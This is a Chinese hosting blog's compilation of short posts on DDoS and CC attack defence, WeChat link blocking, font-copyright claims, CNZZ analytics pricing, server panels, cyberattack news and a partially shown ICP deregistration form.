近年来APP的客户越来越多,被攻击也非常的多。而且相比网站防御APP防御难点很多,网站防御还可以用百度云加速进行防御,价格便宜,而APP防御就不行了,需要制定专门的防御策略,比较麻烦,因此客户都是购买这边专门的高防IP进行防御的,当然价格也比较贵。上次我们说到一位客户因为被CC攻击后,用了我们高防IP拦截成功了,然后对方又改成DDoS超了,攻击量更是达到惊人的160G峰值,不过还是被我们防御住了,目前一直在用我们高防IP。 最近又有一客户APP被攻击了,联系上我们直接购买了高防IP,也是比较信任我们的。客户被攻击的主要是CC攻击,通过大量非法请求导致服务器CPU长期占满,而且量非常大,单CC攻击产生的流量就超过5G,所以客户用的阿里云服务器IP被封了一次。在我们的建议下客户换上了新IP,用这边高防IP隐藏起来,终于正常了。 不过没到2小时APP又打不开了,查看了下,大量CC攻击穿透了高防IP,没成功拦截。我们联系上了技术人员进行了分析,又调整了防御策略,现在终于拦截住了。 检测到的每分钟恶意请求高达496573峰值 每秒请求数13375 可以说CC攻击量非常大的,不过还是被我们拦截住了。 #### 又扛上了!微信朋友圈屏蔽淘口令了 有网友表示最近突然发现微信又开始在朋友圈屏蔽淘口令了!朋友圈发出去的淘口令就自己可以看见,看来微信是对淘宝又下手了,在流量越来越不好获得的环境下,今年618,腾讯和阿里又玩起了躲猫猫。 阿里和腾讯之间一直没太平过,马上又到618活动的关头,微信朋友圈又开始新一轮的屏蔽淘口令,所有的淘口令在微信内都打不开,可以讲成了惯例了。每次到大型活动微信对电商的链接是大规模的屏蔽, 值得注意的是:这一次连合作单位,京东的红包链接都没有放过!也给屏蔽了。 并且有网友表示,原来搞淘口令天天和微信打对抗,换关键词换域名,光域名得换了几百个了吧,现在域名也没了,关键字都被迫用火星字了。看来微信在防止外来流量侵入是下足了功夫。技术是在不断升级。 可以讲:微信作为一个巨大的社交流量池,是很多电商平台想要的推广渠道,微信也意识到这点,严防死守,因此除了选择抱腾讯大腿的电商平台,其他平台想要在微信分点流量是基本不太可能了,尤其是淘宝。只能每次都跟微信玩躲猫猫。也是很无奈。 据说已经有人因为微信屏蔽淘宝链接而把腾讯给告了,希望起点作用吧,否则国内社交平台你屏蔽我我屏蔽你,不是一个事。 #### 又是互联网传销:云创通组织传销被查封 靠卖手机和饮料掩人耳目的小公司云创通,近日被打回了原形——涉嫌传销组织,已被落实领导传销犯罪四百多人给一举抓获了! 云创通(原名深圳市云创通科技有限公司)该公司以销售“云创通YCT11”手机和果果依饮料为载体,直推加盟的销售模式,通过公司内部人员发展下线,俗称师徒关系,新进人员需交纳4780元的入门费成为会员。 据曝光的发展下线人数超过7000人,会员遍布全国10多省市。 就光被缴获的涉案资金达112万元,假币218万元,查扣涉案手机800余台,属于一个典型的组织领导传销案件。 据网友@狙击传销爆料:“云创通”的前身本是“钱脉通”。钱脉通传销被查后改名云创通传销组织,依然利用老套路继续骗人,很多受害者都是通过微信支付给上家,然后层层获利,手机还是三无产品,本质上只是他们作为骗人的媒介而已。 招代理模式也简单:招一个4680元的代理得到1200元的提成 ;销售一台价格3680元的云创通得到提成800元。成为市级代理需要买80部手机,钱却是要打给所谓的创始人,而不是公司银行账号... 由于微商这几年成热门,云创通也专卖给“微商和实体老板,直销,业务人员”等,一不小心就被盯上了... #### 又是字体侵权:某电商公司被方正字体索赔每款字体两万元 刚刚在卢松松博客上看到的一篇关于某电商被方正字体告侵权的消息。 具体应该是这家电商公司没有做功课,在网上下载使用了方正多款版权字体,随后被人家公关部给盯上了,发了一波侵权通知,要求他家店铺所有使用方正字体的图片和文案都全部下架,估计当时这家电商公司也没在意或者涉及产品多,不好下架大量商品影响店铺,暂时搁那了! 但是没想到,接着方正就直接上门来发律师函来索赔了,明确提出,要么出钱买版权他们撤诉,要么打官司赔钱一套两万,反正不给钱这事指定没完。 以下是该电商公司收到的字体公司发来的侵权通知原文 您好,我是方正字库和解部,贵店的免责撒字时间已过,我司取证部在贵店依旧发现大量侵权方正字体,您这边已经构成二次侵权.如果您今天不能给我们一个准确答复,我司将结合今日在贵店取证的侵权证据对责店法人开始法律诉讼,寄出律师函。 贵店二次侵权行为,不在享有免责撤字时间!贵店所有侵权证据我司已取证备案完成,现最后一次通知贵店,给出贵店两种解决方式: 1.和解,需要按照我司提供的和解方式,在我司网完成正规的字体授权,授权之后撤销对贵店的诉讼,同时始您出具相应的字体授权书和发票(补交授权), 让您合法使用! 2.不和解,我司默认贵店可以走司法诉讼流程,按每款字体两万元的诉讼费用对贵店造成的字体侵权问题依法发起诉讼,我司每年的诉讼案例有很多。您可以参考-下。侵权赔偿金额以及相关判罚。 看到这里主机吧只能说方正还算小小良心了下,还提醒侵权下架,主机吧前几年淘宝店的主图,因为使用了网上盗版的汉仪字体,结果直接被索赔了,要求一个字几千块,当时主机吧总共也才用了几个字,而且后来得知那字体也不是他们的,就没管了,后来就不了了知了。现在想想都后怕,这些字体公司没一个是善茬,毕竟人家是靠打官司吃饭的,随便查一家字体公司基本都是一年有上百场诉讼。 做网站自媒体电商的同学要注意啦,一定不要用带版权的内容,字体、图片、视频、文章都不可以,这年头钓鱼执法的人太多了。 #### 又有站长中招,网站域名被腾讯封了 今年以来多位站长服务器、域名被封,理由都是涉及欺诈。可见现在监管是什么严的,而且大有一刀切的趋势,之前就有一位阿里用用户,一个网站涉及欺诈,导致整个帐户60多个网站都被封。最近腾讯又封了一位站长的域名服务器,闹得沸沸扬扬的。 从上面聊天记录来看,站长网站是被监管机构要求封禁的,不给解封,而且也没有申诉渠道。 这种情况主机吧以前也遇到过,主机吧第一个网站做的是QQ资源网,也是被监管机构给要求封的,域名直接被封,服务器被要求关停,还无法申诉,挺惨的,当时找了很久也不知道原因。 国内做网站风险还是挺高的,监管问题是一方面,版权碰瓷一方面,DDOS攻击问题也是一方面,真的难哈。 #### 又有站长遭遇广告勒索DDOS攻击 最近有站长遭遇了勒索攻击,如果网站不挂他们广告,就会被他们DDOS攻击。 这种勒索广告位的一般都是会非法业务的,站长千万别挂,一般都是菠菜之类的内容,一但被相关部门查到,那就不是被DDOS的事了。 对付这种勒索攻击,我们要做好长期安全防御的准备,可购买百度云加速、京东云星盾来防御,效果都是不错的,需要的可以联系主机吧,价格还有优惠。 #### 又杀猪啦!腾讯彻底封杀近3000微信公众号 前些日子腾讯做出了一系列的封号动作,然而微信又将展开新一轮封号浪潮,更有爆料称腾讯已彻底封杀近3000微信公众号,一旦封号永不解除!这次封号受众群体除了靠微信发家致富的营销号,还将包括许多普通用户。 据微博自媒体龚文祥称“腾讯今天彻底永久封杀了3000个微信公众号,是网宣直接封杀。搞新媒体的,不要涉及政治相关的 ”并贴出相关截图, 其实这也有迹象表明大封号来临:近日因小程序游戏“跳一跳”火爆朋友圈而衍生了游戏代练与外挂,鉴于这样的情况,马化腾则下令表示:将坚决打击游戏外挂的泛滥。 同时称会开战第二次微信封号,这一次一旦被封的账号将会永不解除,此次将重点封杀使用第三方程序登录的微信账号,以及低俗言论敏感词的话题账号: 重要通知:关于此次封号影响的源头 经核实,由于凤凰网1月2日发布的内容《寡妇18摸》被网信办惩罚,微信1月4日起开始对内容进行治理。 目前微信端被拉入黑名单的内容包括如下几篇: 1、老公,我脏了,你还要我吗? 2、姐姐太累了,感觉有点疼 3、一万疯狂要了小姨6次,插的小姨狂流不止,结果惊呆了 4、这什么没毛的女生不能碰 以上4篇内容是某派单平台使用的暴款标题,全网发布量极大,目前已被控入黑名单,现在能确定的是,发过以上4篇文章的公众号被封概率高达90%以上。不管是现在保留了文章的还是已经删除了的,微信会有群发历史记录。所以发过以上4篇文章的号想逃过此次被封的可能性较小。 这次真的是“惹怒”了腾讯和相关部门,不过多数网友表示是该清扫了,封杀也许将会成为未来常态;社会需要正能量的音符,事到如今,这不过一个导火索而已。 最后,主机吧也提醒大家,最好不要在同一IP下多微信号长期登录、手机微信多开、使用微信外挂软件、微信插件、辅助工具、脚本等,同时尽可能避免敏感词,不使用第三方程序登录的微信账号;总之避免触及底线的要好呀,不过主机吧认为还是自己建个独立博客好,起码安全感很好,你是怎么认为的呢? #### 友盟+(CNZZ)统计收费发布了,最低819元一年 前段时间友盟+统计停止了免费用户接入后,今天主机吧发现,官方收费方案发布了。 最便宜的套餐819元一年,日志量最高1000万,这个看着很多,实际上如果你的日流量破万的话,很容量超的,一些活跃比较高的网站,估计都不需要破万就会超。 所以这样算下来的话819元一年相当贵的,如果你是一个流量垃圾站的话,买这种统计相当不值,因为靠广告费都要挣很久才把统计费用挣回来,更别说还有域名、服务器费用了。 这几年互联网公司并不好过,很多以前免费的服务停的停,收费的收费,有的甚至停止开发了。连停止开发了78年的织梦都出来维权了,前段时间群里的一站长反馈百度联盟广告费越来越低了,可见互联网寒冬真的来了。 #### 友盟统计(CNZZ)正式停止提供免费服务 5月11日 消息:友盟统计今天正式停止提供免费服务了!用户打开友盟统计页面发现非付费用户已无法使用友盟+ U-Web 统计分析产品,如需使用则需要购买相关服务。 据了解,友盟统计的收费标准是按照PV计算的,如月日志量0-1000万,1年的套餐价格为819元;月日志量1000万-2000万,1年的套餐价格为1569元;月日志量2000万-4000万,1年的套餐价格为3109元; 月日志量4000万-1亿,1年的套餐价格为7799元;月日志量1亿-2亿,1年的套餐价格为14999元;月日志量2亿-5亿,1年的套餐价格为36999元;月日志量5亿-10亿,1年的套餐价格为72999元。 早在今年3月份,友盟+就宣布了将停止提供免费的网站统计分析服务的消息。从2022年5月10日起,U-Web不再提供免费新建站点,仅为付费账号提供创建站点能力。 友盟+ U-Web是原CNZZ站长工具,服务750万家网站。帮助站长、商业网站、大型网站多种角度了解网站运营数据,是网站运营数据管理评估的基础工具。 主机吧不禁感叹,果然免费时代过去了哈, 连网站统计都开始收费了,以后还有什么不能收费的呢? #### 友盟(CNZZ)统计工具将停止未备案域名接入服务 1月21日 消息:今日,友盟官方发布通知称,自 2022 年 3 月 20 日起,网站统计U-Web将停止部分站点服务。 友盟在公告中称,应安全监管要求,网站统计U-Web将停止以下两种类型站点的服务: 1. 海外站点 2.90 天内无友盟+登录用户访问、查看数据的站点 开发者可以在 2022 年 03 月 20 日前,使用“下载报表”功能保存历史数据。另外,如果站点不属于上述情况,但是被停止服务了,可通过(网址)提交工单,并提供站点域名、ICP备案号、主办单位名称及其营业执照,让友盟方面协助解决。 以下为官方通知全文: 尊敬的开发者:由衷地感谢您一直以来对网站统计U-Web(又名,CNZZ)的信任与支持,也感恩我们长期的友好合作。U-Web始终以中国互联网数据为己任,专注于数据统计与挖掘。近十多年来,为中国的网站及中小型企业提供了互联网数据监测、统计分析的技术研究、产品开发和应用等服务。为开发者提供便捷、易用的产品服务,是我们的使命。应安全监管要求,从 2022 年 3 月 20 日起,网站统计U-Web将停止以下两种类型站点的服务:1. 海外站点2.90 天内无友盟+登录用户访问、查看数据的站点为此给您带来的不便我们深表歉意。在此感谢您对友盟+长时间以来的认可和支持。以上,友盟+ 其他问题: Q:我是否可以导出数据? A:您可以于 2022 年 03 月 20 日前,使用“下载报表”功能保存历史数据。 Q:我的站点不属于上述情况,但是被停止服务了,应该怎么办? A:请您通过(网址)提交工单,并提供您的站点域名、ICP备案号、主办单位名称及其营业执照。我们将协助您进行下一步处理。 Q:因长时间无登录用户访问而停止服务后,如何进行重启? A:您仅需登录友盟+账号后,访问相应站点。我们将在您访问后次日重启服务。 Q:重启服务后,停止服务期间的数据是否可以找回? A:停止服务期间的数据将无法找回,对此我们深感抱歉 如申诉,请复制进入以下链接: https://account.umeng.com/feedback/create?category=20712%7c81238005 #### 发布多条手机不实评测,某数码博主被判赔偿荣耀8万余元 2 月 9 日消息,广州市中级人民法院今日发文,荣耀公司诉某测评博主侵害名誉权案判决,测评博主赔偿荣耀公司 86698 元。 据介绍,小江(化名)是一名拥有 10 万 + 粉丝的微博加 V 用户,用户名为“小江测评(化名)”,其微博账户认证为“数码博主”。2021 年 2 月至 5 月,小江在其微博上连续发布了一系列针对荣耀 V40、Play5t、畅玩 20 以及 x7 平板电脑多款数码产品的评价。 荣耀终端有限公司(以下简称荣耀公司)认为小江在数码圈有着较大的网络影响力,其持续发布诋毁、诽谤荣耀产品的内容,已严重侵犯了荣耀公司的名誉权,遂诉至法院,要求小江立即删除案涉侵权内容、赔礼道歉并赔偿经济损失 100 万元及维权合理支出 76698 元。 庭审中,小江确认其并未就微博所述荣耀产品进行过实际的测评。 广州互联网法院一审判决:小江在其微博账号首页置顶发布道歉声明,向荣耀公司赔礼道歉,为荣耀公司消除影响、恢复名誉;小江向荣耀公司赔偿经济损失 60000 元以及合理开支 26698 元,合计 86698 元;驳回荣耀公司其他诉讼请求。 后续双方未上诉,该判决已生效。 IT之家了解到,广州市中级人民法院表示,小江是拥有粉丝量超过 10 万的微博加 V 用户,系微博活跃用户,且微博认证为“数码博主”,其在微博上发布的数码类产品信息,会引起粉丝或其他网络用户的关注。 小江在发布转载的微博时,并未完整客观呈现原文内容,存在恶意拼接其他用户评论、选择性引用转载文章中贬损言论的行为。 此外,案涉原创微博内容并无客观依据。小江作为一名“数码博主”,关于数码产品的微博言论均不是经过其本人对产品的测评或者体验而发表,也未经适度查证。 #### 发现一不错的WEB服务器控制面板 最近,主机吧对博客进行服务器更换的时候,想着宝塔面板用腻了,换个控制面板试试。 找了圈,发现了一个不错的服务器控制面板:1Panel 安装下来非常快,相比宝塔面板,1Panel后台登陆并不需要注册宝塔的帐号才可以登陆,响应也非常快,最要紧的是完全开源免费的。 有需要的同学可以去看看。 官网地址https://1panel.cn/ 后台演示:https://demo.1panel.cn/ 1Panel 拥有强大的建站功能,用户可以在 1Panel 面板的协助下快速建立自己的个人博客或者公司网站。 1Panel 的应用商店提供了 WordPress、Halo 等几款主流建站工具供你选择。Halo 是一款功能强大且易于使用的开源建站工具,配备了丰富的模板和插件,可帮助你快速构建理想的网站。 实际上,用户不借助 1Panel 面板也可以通过 Docker 或直接在服务器下载安装这几款建站工具。但借助 1Panel 的帮助,可以省去许多繁琐复杂的安装步骤,简化下载和安装的过程,只需填写基本信息即可轻松完成建站操作。 此外,1Panel 也极大地简化了网站域名绑定、SSL 证书配置、反向代理等复杂配置,让人人都可以轻松建站。 多种防护,安全可控 1Panel 项目采用 Golang 语言编写,并通过容器来部署和管理各类应用,从而将系统对外部的漏洞暴露面控制在最小范围内。 1Panel 内置了 Firewalld 和 UFW 两款防火墙软件,确保服务器的安全性。用户也可以在 1Panel 中创建自定义的端口规则和 IP 规则,以应对潜在的恶意攻击。 为了确保服务器的安全性,1Panel 提供了多种身份验证方式,包括登录认证、两步验证、安全入口、域名绑定和 IP 授权等。 这些措施能够有效验证访问服务器的用户身份,将未经授权的访问者拒之门外,防止数据泄露,维护服务器的安全性。 数据备份,一键恢复 为了确保数据的安全性,防止数据丢失,1Panel 提供了以下功能: 用户可以在计划任务中设置定时任务,包括网站、数据库或文件目录的备份,并支持将备份数据存储至云端。 此外,一键恢复功能也可用于在需要时方便地恢复备份数据,从而避免了服务器运维中数据丢失所带来的后顾之忧。 #### 发现一个非常不错的免费wordpres在线客服插件 Online Contact Widget插件,这个插件是由国内知名wordpress开发商闪电博开发的,支持QQ、微信、电话、邮箱和留言等联系方式,并且该插件支持自定义外观样式,以符合不同的WordPress主题设计风格。 主机吧的云加速网站就使用了这个插件:https://www.yunjiasu.cc 主机吧挺喜欢这个风格的在线客服聊天方式的,有点类似于弹窗聊天。 Online Contact Widget插件有收费版的,自定义能力更强,不过主机吧看了下免费版的基本够用了,如果你需要更自定义的推荐你买收费版的,不差钱的就当支持下作者,毕竟国内目前开发wordpress的程序员越来越少了。 官方详细介绍:https://www.wbolt.com/plugins/ocw #### 发现百度云加速一漏洞:有暴露源服务器IP风险 最近在帮一个客户接入百度云加速海外的版的时候,发现一个问题:即在用cname别名接入的时候,在TXT验证没生效时,百度云加速产生的cname记录是不会隐藏源服务器IP的,而是直接回源解析。 这也就导致了如果客户需要急于隐藏服务器IP的话,在接入百度云加速后很长一段时间黑客是可能通过ping百度云加速的别名记录找到最新源服务器IP的。 这个很危险,一但被知道最新的IP只能再更换了。那么要如果更安全的接入呢? 主机吧的操作是在接入添加子域名的时候指向IP乱写一个IP 等解析生效TXT后 我们再进入子域名管理里面把记录值改回真实的服务器IP 这样就不会有暴露源服务器IP的风险了! #### 口袋理财被公安部门查封 暂时停止运营 3月28日 消息:据财联社消息,P2P平台口袋理财发布公告称公司因需配合公安部门调查,电脑、通讯设备等遭查封暂无法正常运营。即日起,口袋理财将暂停发标,用户本金到期可正常提现。 据官网资料显示,口袋理财上线于 2014 年 12 月,隶属于上海鱼耀金融信息服务有限公司。其资金由江西银行存管,无分支机构。 以下为口袋理财公告: 关于口袋理财近期运营调整的公告 尊敬的袋王: 您好! 近日来,平台未能及时解答袋王们的咨询、社区留言等,口袋理财对此向各位袋王们表示诚挚的歉意。 3 月 25 日上午,口袋理财被江苏省某地区公安部门调查,公司所有电脑、通讯设备等办公设施当日即被查封,导致平台及员工暂时无法正常运营、办公,故未能及时对袋王们的咨询做出回复,我们再次表示歉意。 目前,口袋理财正积极配合公安部门的调查,公司管理层已于第一时间进行了沟通处理,公司员工坚守岗位于家中办公。同时,口袋理财也在第一时间向行业监管部门、行业协会进行了汇报。口袋理财和所有用户一样,希望能尽快恢复正常运营、确保正常兑付。 经公司管理层审慎研究决定,平台运营暂时调整如下: 1。自本公告发布之日起,平台暂停发标。 2。用户出借本金在对应出借项目到期还款后均可正常提现。但因目前提供出借项目利息核算及发放技术支持的设备和人员无法常态化工作,故出借项目收益需延至相关设备和人员恢复正常工作后进行结算和发放。 口袋理财成立至今,始终按时回款,从未出现过兑付问题。平台借款人、出借人的账户资金由江西银行进行全量存管;出借项目资产均为来自于资产合作方推荐的真实、优质的小额消费贷和信用贷,如有逾期,将由资产合作方进行回购处理。经统计,目前平台资产端项目均正常回款。公司在此郑重承诺,口袋理财有足够的信心完成平台所有项目的兑付工作,请袋王们放心! 平台后续进展,我们将第一时间以公告形式告知。由此给您带来的不便,请您谅解。再次向各位袋王们表示诚挚的歉意! 口袋理财 2019 年 3 月 28 日 #### 另类的防御方法:把阿里云服务器ip段全封了 阿里云的服务器一直都是国内攻击的肉鸡源,最近论坛上某位站长就想到了干脆直接把阿里云服务器的IP段全封了,毕竟这些服务器是不应该访问你网站的,除非是爬虫、暴力破解、恶意链接。 阿里云服务器的ip还有很多,而且在不断增加,所以需要定期的更新,如果你有新发现的ip段 也请留言下来,互相补充,感谢。毫不夸张的说,把这些阿里云机房ip都屏蔽了,你就安全了一半!每天乱七八糟的一看大多都是用的阿里云!注意后面地址改成 .255.2558.208.0.0——8.209.0.060.205.0.059.110.0.047.92.0.0——47.129.0.0 是阿里云其余全是国外,47.0.0.0封42.120.0.0——42.121.0.039.96.0.0——39.108.0.0223.4.0.0——223.7.0.0218.244.144.0218.244.128.0203.107.0.0182.92.0.0170.33.0.0139.224.0.0123.56.0.0——123.57.0.0121.40.0.0——121.43.0.0121.196.0.0——121.199.0.0120.76.0.0——120.79.0.0120.55.0.0120.24.0.0——120.27.0.0119.23.0.0118.31.0.0118.190.0.0118.178.0.0116.62.0.0115.28.0.0——115.29.0.0114.55.0.0114.215.0.0112.74.0.0112.124.0.0——112.127.0.0110.76.32.0106.14.0.0——106.15.0.0103.15.96.0101.37.0.0101.200.0.0——101.201.0.0101.132.0.0——101.133.0.0 #### 可以更改网站字体 加速中文字体加载的网站 如果你看腻了网站默认的字体,想给网站更换一种好看的字体,但是中文字体又太大,如果本地化字体加载又太卡。 那么不妨试试这个网站提供的网络字体服务。 在线字体又叫web font或网络字体,是CSS3中的一个模块,主要是把自定义的特殊字体嵌入到网页中。 免安装、免下载、直接在线使用。 有字库(webfont.com)为全球第一中文在线字体服务平台。 由于设计的需要,网站中难免会用到一些比较特殊的字体(如方正字库)来装饰我们的网站,让其更加美观,我们可以用CSS的font-family属性来设置文本字体。然而设置的字体如果是用户的电脑上没有安装的字体,那么对不起,文字将以宋体呈现,这大大的影响了用户体验。 我们经常能看到国外的一些网站使用了非常漂亮的字体,而这些字体通常在用户的电脑中是没有安装的,如何实现的?如何让特殊字体在网页客户端显示?目前方案有两种: 制作图片嵌入网页。 引用在线字体。 第一种方案生成图片是现在主流的中文字体解决方案,但是有很大的缺陷,维护麻烦、不利于SEO! 第二种方案在线字体是一种创新的解决方案,在国外已经相当流行,包括Google fonts、Adobe typekit等知名服务商。 通过上传字体文件到指定目录,然后在CSS中用规定格式进行引用就可以使字体效果跃上你的页面了,使网页用字不再受客户端影响。 这么酷的东东,为什么以前都不曾了解? 因为中文字体过于庞大,小则三五兆,大则十几兆,所以在线字体只流行于英文网站,虽然中文网页设计师望眼欲穿,但也无可奈何。临渊羡鱼,不如退而结网,而现在我们通过按需截取的方式生成小字库,可以小到几十K,甚至几K,终于有效控制了字体文件的大小,使中文也加入了网络字体的阵营。 国内主流浏览器都支持吗?比如:IE、360、搜狗、火狐、chrome、safari、Opera。答案是:YES!! #### 可供淘宝店铺免费商用的字体 阿里巴巴官方字体惠普体 要说国内哪家互联网公司最仁义,那非阿里巴巴莫属了,最近推出了免费可供个人企业商用的字体:惠普体 这一款阿里巴巴普惠体,总共收录 116,895 个全形汉字(含 5 个字重),西文 Alibaba Sans 共 7,205 个拉丁字母(2 种风格、共 11 个字重),覆盖 172 个语种(覆盖大部分欧语国家),可以说适应了全球大部分用户的需求。 官方已经声明: 1 可以允许任何企业/个人免费使用,包括商用,但拒绝违法用途 2 版权归属阿里巴巴,在没经过允许的情况下,不得上传、发布、转载字体文件,拿来售卖的要被追究 3 为确保安全,要在官方指定下载通道下载  官方下载地址:https://alibabafont.taobao.com/ 主机吧自己测试了下,下载安装包后,解压文件夹至桌面 依次对字体文件进行安装 安装完后,我们打开Photoshop看下,果然成功了!阿里字体非常好看,赶紧去试试吧! #### 可怕!写软文的行业要被ChatGPT取代了! 这不是危言耸听,而是真实发生了,今天看到卢松松代写软文业务因为ChatGPT的影响,被客户要求退款了。 这看起来是小事,但是这意味着ChatGPT是可以完全取代代写软文的工作了。 主机吧也曾试过用ChatGPT写软文,确实厉害,只要正确引导ChatGPT,它会写得比你还好,还专业。 #### 可怕!美国向黑龙江Windows设备发加密字节:唤醒、激活微软操作系统提前预留的特定后门 4月15日消息,今日,央视等国内媒体披露了美国网络攻击哈尔滨亚冬会的细节。 前期,“2025年哈尔滨第九届亚冬会”遭受境外网络攻击事件经媒体报道后,引发广泛关注。 国家计算机病毒应急处理中心和亚冬会赛事网络安全保障团队,及时向哈尔滨市公安局提交了亚冬会遭受网络攻击的全部数据。 哈尔滨市公安局立即组织技术专家组成技术团队开展网络攻击溯源调查。在相关国家支持下,经技术团队持续攻坚,成功追查到美国国家安全局(NSA)的3名特工和两所美国高校,参与实施了针对亚冬会的网络攻击活动。 细节中提到,美国国家安全局(NSA)主要围绕特定应用系统、特定关键信息基础设施、特定要害部门开展网络渗透攻击,涵盖数百类已知和未知攻击手法,攻击方式超前,包括未知漏洞盲打、文件读取漏洞、短时高频定向检测攻击、备份文件和敏感文件及路径探测攻击、密码穷举攻击等,攻击目标、攻击意图明显。 技术团队还发现,亚冬会期间美国国家安全局(NSA)向黑龙江省内多个基于微软Windows操作系统的特定设备发送未知加密字节,疑为唤醒、激活微软Windows操作系统提前预留的特定后门。 公开资料显示,2025年哈尔滨亚洲冬季运动会(The 9th Asian Winter Games Harbin 2025),于2025年2月7日至2月14日举行。是继2022年北京冬奥会后中国举办的又一重大国际综合性冰雪盛会。 近日,中国国家计算机病毒应急处理中心和计算机病毒防治技术国家工程实验室发布的一份网络攻击情况监测分析报告显示,亚冬会期间,各大比赛的赛事信息系统以及黑龙江省域内的关键信息基础设施都遭到了大量的境外网络攻击。 攻击发生后,国家计算机病毒应急处理中心和360集团等境内网络安全机构的技术专家迅速行动,开展网络攻击溯源调查。 360依托全网安全大数据和自主研制的安全大模型第一时间对此次大规模境外网络攻击进行溯源,结果显示,此次攻击的幕后黑手是美国国家安全局,并且首次锁定了发起攻击的个人,成功追查到美国国安局的三名特工和两所美国高校。 目前,哈尔滨市公安局已对三名隶属于美国国安局的犯罪嫌疑人进行悬赏通缉。 数据显示,此次亚冬会受到的攻击次数高达27万次,其中受攻击的赛事信息系统包括赛事信息发布系统、抵离管理系统和收费卡系统等,上述系统对于赛事的重要信息发布、人员和物资的调配、赛事的组织管理起到至关重要的作用;黑龙江省范围内遭受攻击的关键信息基础设施涵盖能源、交通、水利、通信、国防科研院校等重要行业。 这些攻击妄图破坏、干扰赛事正常进行,以及通过攻击我国关键信息基础设施制造混乱并窃取敏感情报。 360的实战安全专家介绍说,美国国安局主要围绕特定应用系统、特定关键信息基础设施、特定要害部门开展网络渗透攻击,涵盖数百类已知和未知攻击手法,攻击方式超前,包括未知漏洞盲打、文件读取漏洞、短时高频定向检测攻击、备份文件及敏感文件及路径探测攻击、密码穷举攻击等,攻击目标和意图十分明显。 #### 台积电遭黑客攻击,黑客威胁索要 7000 万美元赎金 7 月 1 日消息,台积电近日向国外科技媒体 TechCrunch 证实,公司遭到了网络攻击,部分数据泄露。 台积电发言人表示,本次网络安全事件导致“与服务器初始设置和配置相关”的数据泄露,但台积电客户信息并未受到影响。 台积电部分官方声明如下: 台积电经过审查,本次网络安全事件并未影响台积电的业务运营,也没有泄露台积电的任何客户信息。 台积电在事件发生之后,立即根据公司的安全协议和标准操作程序,终止与该供应商的数据交换。 勒索集团 LockBit 宣称对本次安全事件负责,官方在其网站上列出了相关数据,并索要 7000 万美元 LockBit 表示,如果台积电不付款,它还将发布密码和登录信息。LockBit 表示相关数据是从 Kinmax Technology 窃取的,该公司为台积电提供网络,云计算,存储和数据库管理等 IT 服务。 #### 史上最大的DDoS攻击:亚马逊AWS称其阻止了创纪录的 2.3 Tbps DDoS 攻击 6月18日 消息:据外媒报道,亚马逊表示,其AWS Shield服务经受住了有记录以来最大的DDoS攻击,今年 2 月份中旬它阻止了一场2.3 Tbps DDoS攻击。 亚马逊在AWS Shield威胁态势报告中披露了这一事件,报告并未指出遭到攻击AWS客户,但表表示针对AWS的攻击是基于CLDAP反射的攻击,一共持续了三天。 据悉,CLDAP是旧LDAP协议(轻量级目录访问协议)的替代协议,用于连接、搜索和修改internet共享目录。 自 2016 年底以来,该协议一直被滥用于DDoS攻击。由于CLDAP服务器将DDoS流量放大了最初规模的 56 至 70 倍,这使其成为广受欢迎的协议,也是DDoS租赁服务的常见选择。 有记录以来最大的DDoS攻击的先前记录是1.7 Tbps,在 2018 年 3 月被知名DDoS防护厂商NETSCOUT Arbor阻止了。 在这之前的一次最大的DDoS攻击是, 2018 年 2 月GitHub遭受1.3 Tbps的DDoS攻击。2015年的时候,百度云加速2015的时候也有进行过1T的DDoS攻击防御演练,当时也是震惊业界。 据悉,大多数DDoS攻击的峰值通常在500 Gbps范围内,这就是为什么有关AWS 2.3 Tbps攻击的消息令业内人士感到意外。 #### 史蒂芬·霍金逝世 享年76岁 据英国天空新闻等多家媒体消息,著名物理学家与宇宙学家史蒂芬·霍金逝世,享年76岁,其家人及发言人均已确认此消息。斯蒂芬·威廉·霍金(Stephen William Hawking),1942年1月8日出生于英国牛津,英国剑桥大学著名物理学家,现代最伟大的物理学家之一、20世纪享有国际盛誉的伟人之一。 霍金21岁时患上肌肉萎缩性侧索硬化症(卢伽雷氏症),全身瘫痪,不能言语,手部只有三根手指可以活动。 1979至2009年任卢卡斯数学教授,主要研究领域是宇宙论和黑洞,证明了广义相对论的奇性定理和黑洞面积定理,提出了黑洞蒸发理论和无边界的霍金宇宙模型,在统一20世纪物理学的两大基础理论——爱因斯坦创立的相对论和普朗克创立的量子力学方面走出了重要一步。 霍金曾获得CH(英国荣誉勋爵)、CBE(大英帝国司令勋章)、FRS(英国皇家学会会员)、FRSA(英国皇家艺术协会会员)等荣誉。 霍金教授的子女露西、罗伯特和蒂姆在一份声明中表示: “我们深爱的父亲已于今日辞世,我们为此感到极度伤心。他是一名伟大的科学家,一个卓越的人,他的工作成功将会在为来许多年继续存在下去。他的勇气和坚持以及他的天才与幽默鼓舞了来自世界各地的人。他曾经说过: ‘如果不能为你所爱的人提供一个家,宇宙就没有什么意义了。’ 我们将会永远怀念他。 #### 吃暗亏!美国参议院恢复中兴销售禁令 14亿美元要打水漂? 本以为达成新协议后,中兴只要缴纳 14 亿美元罚款此事就能告一段落了。然而,反转来得斗玩网首发原创太快就像乱卷风! 6 月 19 日,据纽约时报报道,美国参议院以85- 10 的投票结果通过恢复中兴通讯销售禁令法案。 这意味着,美国将再次禁止供应商向中兴通讯销售产品。由于赞成票超过三分之二,川普总统已经无法否决。 而十天前,中兴和美国商务部才刚达成了新的和解协议,对方要求中兴支付 14 亿美元罚款更换董事会及高级管理团队,并在内部设置美国合规官员团队以监控其合规情况,期限为 10 年。美国参议院指责特朗普总统允许一家违反美国规定的公司继续营业,认为这将使国家安全面临风险。对此,业内人士纷纷指责美方出尔反尔。刚恢复一点的中兴这下又要凉了~ 据悉中兴之前已经如数交了14亿美元的罚款,如果消息属实,中兴得气出血,这样吃暗亏,商务部能忍?!反正我是忍不了。。 #### 吉林省备案用户注销备案申请表.doc 填表须知:(本页是填写须知,不必打印发送) 1、本表格仅适用于备案主办单位用户注销网站备案。除非另有说明,否则每项为必填项。填表前请登录beian.miit.gov.cn的公共查询确认备案情况。 2、按拟注销的备案主体与申请人关系,分为申请注销本单位备案和申请注销其他与本主体或域名发生重复(冲突)的主体备案; 3、(1)申请注销主体备案和注销网站备案的,资料无误我处可直接注销。 (2)如申请注销多域名网站部分域名注销的,申请人为备案主体的请通过备案变更实现,申请人非备案主体的,可填写此表。 4、请根据以上情况使用A4打印纸打印《注销备案申请表》并填写,纸张不符或未准确清晰完整填写者,视为无效申请。 5、需提供的资料: (1)主体信息为单位的: 盖有公章的申请表; 